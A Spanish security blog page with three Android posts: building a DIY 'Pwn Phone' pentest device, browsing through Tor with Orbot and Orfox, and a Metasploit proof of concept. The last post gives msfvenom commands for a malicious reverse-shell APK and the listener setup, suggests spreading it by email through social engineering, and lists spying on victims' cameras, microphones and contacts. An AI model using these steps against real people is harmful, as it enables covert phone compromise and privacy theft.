Mostrando entradas con la etiqueta android. Mostrar todas las entradas
Mostrando entradas con la etiqueta android. Mostrar todas las entradas

lunes, 12 de septiembre de 2016

Mr. Robot Pwn Phone. El teléfono de Elliot DIY


Si, todos estamos enganchados a Mr. Robot y no es un secreto que nos gustan todos sus juguetes. El ultimo ha sido su nuevo teléfono.


Elliot's phone
La escena en la que aparece acompañado con la frase "A phone loaded with 103 network monitoring and attack tools. A dream device for pentesters and hackers" nos capturo a todos.

La compañía que lo desarrolla incluso ha empezado un concurso debido al creciente interés sobre el dispositivo.
Si no somos de los afortunados y tampoco podemos desembolsar los mas de $1000 que cuesta el terminal todavía tenemos una opción bastante mas asequible. Realizarlo nosotros mismos.

El dispositivo sobre el que se basa el Pwn Phone de Pwnie Express es un Nexus 5 que ronda los 100 - 130 € de segunda mano.

* Nota: el siguiente proceso realiza un full wipe al dispositivo. Lo primero que debemos hacer es un Backup de lo que queramos conservar.

Vamos a necesitar el siguiente material:

y el siguiente Software:


Para todo el proceso vamos a utilizar Nexus Root Toolkit que simplifica toda la tarea, automatiza las descargas necesarias y dispone de numerosos asistentes que nos guiaran por todos los pasos.

Ventana principal Nexus Root Toolkit 

Preparación

Lo primero es descargar e instalar Nexus Root Toolkit (en adelante NRT). La primera vez que lo iniciemos nos preguntara por el modelo de dispositivo y la versión de Android instalada.

Selección de modelo

Luego necesitamos instalar/confirmar que tenemos los drivers ADB (Android Debugging Bridge) para ello desde NRT vamos a "Full Driver Installation Guide" y completamos el asistente.

Suele resumirse en activar la depuración USB en el dispositivo, pestaña "Step 3" del asistente de NRT, Install Google Drivers y comprobar que todo funciona desde la pestaña "Step 4".

ADB drivers install
El siguiente punto es desbloquear el Bootloader, este paso realizara un wipe a todo el dispositivo y lo restaura de fabrica.
También lo realizamos a través de NRT con la opción "Unlock" de la ventana principal y nos guiara por una serie de pasos en los que deberemos aceptar el Unlock en la pantalla del dispositivo.

Volvemos a activar la depuración USB. Esto lo tenemos que repetir cada vez que instalemos o restauremos el dispositivo para que NRT pueda seguir comunicándose con el móvil.

Por ultimo para poder realizar la instalación necesitamos partir de la versión 5.1.1 de Android, por lo que desde NRT seleccionamos "Flash Stock + Unroot" y en el asistente marcamos que queremos instalar la ultima revisión de Android 5.1.1.

Factory version 5.1.1 - LMY48M
NRT descarga la imagen de fabrica y realiza todo el proceso con un asistente como en el resto de casos. Cuando el dispositivo se inicie con el nuevo sistema solo queda volver a activar la depuración USB y ya estamos listos para instalar Pwn Phone.


Instalación

Llegados a este punto vamos a instalar la ROM de Pwn Phone (aopp-0.1-20160817-EXPERIMENTAL-hammerhead.zip).
En NRT entramos en "Advanced Utilities" pulsamos "Flash ZIP files from: (Computer)" y en la ventana vamos añadiendo los ZIPs con el botón "Add ZIP's to flash".
Añadimos los zips descargados, aopp-0.1-20160817-EXPERIMENTAL-hammerhead.zipUPDATE-SuperSU-v2.76-20160630161323.zip por este orden.
Ademas marcamos la opción de "Wipe Selected Partitions (Data, Cache, Dalvik)" y pulsamos en confirmar operación.

Instalación AOPP

Después de varios reinicios el dispositivo se inicia con el nuevo sistema. En el primer asistente debemos introducir una conexión Wireless para que el sistema AOPP pueda descargar todo el paquete de herramientas de Pwnie. Cuando termine de instalar pide un reinicio e instalara las actualizaciones disponibles.
Durante la primera instalación y actualización pide permisos de root y debemos concederlos para que termine correctamente.

Instalación Pwnie Tools

Finalmente tenemos un Pwn Phone casero como el del mismísimo Elliot. Aquí podemos ver el resultado.

    


Como bonus podemos seguir instalado herramientas para completar una de las mejores suites de Pentesting para nuestro dispositivo.

La Wiki del proyecto recomiendaHacker's Keyboard, Terminal IDE, Chrome, WiFi Analyzer, BlueNMEA y Fing.

Personalmente añadiría a la lista; cSploit, zAnti, Buigdroid, Intercepter-NG, Fing, Packet Capture, USB Keyboard, DriveDroid, Nipper, sqlmapchik, DroidSQLi, VNC, s/ftp, RDP, VTS y no dejar de visitar las recomendaciones de nuestro compañero Vasco.


Belane



miércoles, 6 de abril de 2016

Android y Tor: Navegación segura con Orbot y Orfox


Buenas noches hackers!! Últimamete en Fwhibbit estamos tocando mucho los temas relacionados con la red Tor: creación de servicios ocultos, la web profunda, conexión de troyanos a través de Tor... ¡y lo que nos queda! Siguiendo un poco el tema, y aprovechando que he estado últimamente tonteando mucho con ello, hoy vengo a introduciros la navegación anónima mediante Tor en Android.

Actualmente una gran parte de nuestra navegación por la red es realizada mediante nuestros terminales móviles. Aunque gran parte de ese tráfico no querremos camuflarlo (pasar nuestra conexión a Facebook por Tor pierde su sentido por razones obvias), hay ciertas operaciones que querremos pasar por la red anónima: comunicaciones privadas, divulgación anónima, acceso a cuentas con la que no queremos que se nos relacione...

Para ello, podemos utilizar las herramentas que nos proporciona el grupo Guardian Project: Orbot y Orfox.

 Orbot y Orfox - Navega de forma anónima y segura

https://lh3.googleusercontent.com/iGAZ0rWvU-gGFiQrI4Vfb9AI3wn2kx0p1n7dtsPX9AJVASx18Bn5m6uGu2Tr8_8n35E=w300
Orbot
Orbot, el producto central de las apps que nos ofrecen, es nuestra puerta de entrada a la red Tor. Contiene todo lo necesario para abrir una conexión mediante proxy local a dicha red, que puede ser utilizada a través de cualquier aplicación que permita dirigir su tráfico a un proxy. Esto es, en esencia, el mismo proceso que en un PC convencional. Aunque si no utilizamos Tor más que para navegar, la siguiente app es todo lo que necesitamos para empezar.
Orfox, un navegador basado en Firefox para Android, utilizará la conexión creada por Orbot para permitirnos navegar por la red a través de Tor. Tiene varias opciones preconfiguradas para hacer la navegación lo más anónima y segura posible, como el uso forzado de HTTPS y el bloqueo de tecnologías como Java o Flash, incluso Javascript a ciertos niveles.
Cover art
Orfox
Ambas apps pueden instalarse de forma rápida desde la Play Store de Android, y pueden ser utilizadas sin tener nuestro dispositivo rooteado. Una vez instaladas, solamente tenemos que activar Orbot y empezar a navegar desde Orfox.

Activación de Orbot y navegación con Orfox

Para ello, abriremos la interfaz de Orbot y veremos que no puede ser más simple. Con una pulsación larga sobre la cebolla, el servicio comienza a activarse, y te avisará cuando establezca la conexión. La misma pulsación larga ahora serviría para desactivar el servicio. Además, deslizar con el dedo por la cebolla hacia un lado servirá para actualizar nuestra identidad en la red Tor, adquiriendo una nueva ruta de conexión.

Vista general de Orbot

Una vez activada nuestra conexión a la red Tor, podemos abrir el explorador Orfox para navegar de forma segura. A todas luces, la impresión es de ser un Firefox para Android apenas modificado, así que no nos costará adaptarnos. La recomendación es acceder a la página de comprobación de que estamos utilizando la red Tor para navegar, solo por asegurarnos. Si todo es correcto, se nos mostrará la confirmacíon de que estamos protegidos.

Confirmacíon de nuestra conexión a Tor

Desde el mismo navegador podremos acceder a cualquier sitio de la Internet pública y además cualquier sitio de la red profunda y los servicios ocultos. Sin embargo, hay que tener en cuenta que algunos ISPs bloquean el acceso a Tor y en ocasiones no podremos conectaros desde/hacia algunos lugares. Una posible opción es el uso de puentes, una opción contemplada en Orbot.

Extra: Protege todos tus servicios

Orbot puede proteger todos nuestros servicios mediante lo que llama Transparent Proxying. En resumidas cuentas, se asegura de que todas las conexiones de red del teléfono se realizan pasando por Orbot, que las redirige a la red Tor. De esta forma podemo acceder a la red mediante cualquier otra aplicación (¡¡ten cuidado con lo que usas!!).

La "desventaja" de esto es que para usarlo debemos proporcionar a Orbot acceso de root; es decir, debemos tener nuestro teléfono rooteado. Es una buena ocasión para hacerlo, ¡aprovecha!

Para activar el Transparent Proxying debemos activar las tres primeras opciones en su apartado dentro del menú de configuración de Orbot, dando con ello permisos de root a la aplicación, activando el proxy transparente y forzando todas las aplicaciones a pasar por Orfox (podemos seleccionar apps concretas en vez de esto).

Activando el Transparent Proxying

La última opción activa este proxy cuando utilizamos el móvil como punto de acceso mediante la zona wifi o la conexión USB; puede resultar interesante, pero no ahondaremos mucho en ello.


Bueno chicos, hasta aquí la entrada de hoy. Espero que os haya gustado y os sirva para aprender mucho acerca de la protección de nuestras comunicaciones. Si tenéis cualquier duda, por supuesto, dejad un comentario o contactad con nosotros.

Un saludo hackers!!
hartek

sábado, 27 de febrero de 2016

Hackeando dispositivos android con Metasploit

Autores: Juan Velasco y Diego Jurado





Hola hackers! Hoy os traemos una pequeña prueba de concepto de cómo un atacante podría acceder a nuestros datos y dispositivo Android. Para ello realizaremos las pruebas en una simulación mediante el uso de máquinas virtuales.

¡¡Vamos allá!!



Paso 1: Configuración de red



Comprobar conexiones entre los dispositivos


Como trabajaremos en local, puesto que se trata de una prueba de concepto, usaremos dos máquinas virtuales. Una con la distribución Kali Linux 2.0 y otra con una distribución de Android 4.4 que puedes encontrar aquí.


Una vez que tenemos las dos máquinas virtuales encendidas y en funcionamiento, tenemos que ponerlas en modo NAT. Es decir, en red local o interna.




Comprobamos que tenemos conexión entre ambas máquinas realizando un ping entre las dos direcciones IP. Para obtener la dirección IP de nuestro dispositivo Android tenemos que dirigirnos a “Ajustes → Acerca del teléfono → Estado”, teniendo una conexión activa a internet.


Configurar puertos del router


Configuramos puertos del router, abrimos por ejemplo el puerto 5555 y ponemos la interfaz de la máquina virtual que estamos usando, en nuestro caso Kali-Linux.

La máquina virtual Kali tiene la ip (192.168.1.53), tiene que estar en la misma subred que la máquina física desde la cual configuramos el router (192.168.1.33) y deberá estar en modo transparente (Modo Bridged).

Una vez configurados los puertos del router, y la red, procedemos a la creación del malware.



Paso 2: Creación del APK malicioso


Nos vamos a la máquina virtual de Kali Linux, abrimos terminal y ponemos el siguiente comando:

msfvenom -p android/meterpreter/reverse_tcp LHOST=direccion_ip LPORT=puerto R> apkmalicioso.apk

En nuestro caso:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=5555 R> apkmalicioso.apk

Nota: Deberemos poner en LHOST nuestra dirección ip de Kali Linux y en LPORT el puerto que hemos abierto en el router, en nuestro caso el 5555.

Ya tenemos nuestro apk malicioso creado, ahora es importantísimo darle permisos de ejecución desde las propiedades, ya que si no lo hacemos, el usuario no podrá ejecutar e instalar dicha apk.



Ahora toca distribuir nuestro malware vía email, Dropbox o cualquier herramienta de descargas. Ingeniería social.

Como diría Kevin Mitnic



Por otro lado, deberemos abrir metasploit framework y realizar el exploit para escuchar posibles conexiones de nuestras víctimas.


En este caso, lo que haremos será utilizar el exploit multi/handler y el payload reverse_tcp de android para escuchar conexiones ya que serán las víctimas las que se conecten a nosotros.

  1. use multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set lhost direccion_ip_kali
  4. set lport 5555
  5. exploit –j (ponemos el –j para permitir más de una conexión y por tanto para poder abrir varias sesiones al mismo tiempo).

En cuanto la víctima descargue e instale la aplicación, obtendremos una sesión de meterpreter, como podemos ver en la imagen.



Paso 3: Jugando con meterpreter


Ya tenemos la sesión de meterpreter, por lo que tenemos acceso TOTAL al dispositivo móvil.

Es hora de empezar a jugar…

Esta es una lista de algunos comandos que podemos usar:


Podemos mostrar información sobre el sistema:


Listar todos los procesos abiertos:


Acceder a la shell del sistema para navegar por carpetas…


Mostrar las cámaras disponibles


Pudiendo tomar fotografías desde ambas cámaras (delantera y trasera)




Grabar sonidos o activar la webcam



Sacar un listado de contactos o últimas llamadas



Estos son algunos de los comandos que podemos realizar. Es importante saber que todos los archivos se van guardando el carpeta /root de kali linux...




Nota: Los autores de esta prueba de concepto no se hacen responsables del mal uso Be good }:)



Google Analytics